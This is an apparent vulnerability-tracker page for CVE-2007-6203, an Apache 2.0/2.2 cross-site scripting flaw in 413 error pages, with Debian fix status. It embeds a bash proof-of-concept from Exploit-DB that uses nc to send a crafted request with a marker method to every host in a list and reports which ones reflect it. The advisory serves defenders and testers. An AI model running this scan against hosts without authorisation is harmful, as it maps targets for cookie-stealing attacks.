CVE-2007-6203

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.

Predictions

Exploit likelihood

55%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-30835 remote unix verified text · 1 KB

Adrian Pastor · 2007-11-30

Apache 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting

text exploit Source: Exploit-DB

source: https://www.securityfocus.com/bid/26663/info

Apache is prone to a cross-site scripting weakness when handling HTTP request methods that result in 413 HTTP errors.

An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.

Apache 2.0.46 through 2.2.4 are vulnerable; other versions may also be affected. 

#!/bin/bash
# PR07-37-scan
if [ $# -ne 1 ]
then
       echo "$0 <hosts-file>"
       exit
fi

for i in `cat $1`
do

if echo -en "<PROCHECKUP> / HTTP/1.1\nHost: $i\nConnection: 
close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 $i 80 | grep 
-i '<PROCHECKUP>' > /dev/null
then
       echo "$i is VULNERABLE!"
fi

done

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`2.2.6-3`
sid	Fixed	`2.2.6-3`
forky	Fixed	`2.2.6-3`
bullseye	Fixed	`2.2.6-3`
bookworm	Fixed	`2.2.6-3`

References

https://security-tracker.debian.org/tracker/CVE-2007-6203

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.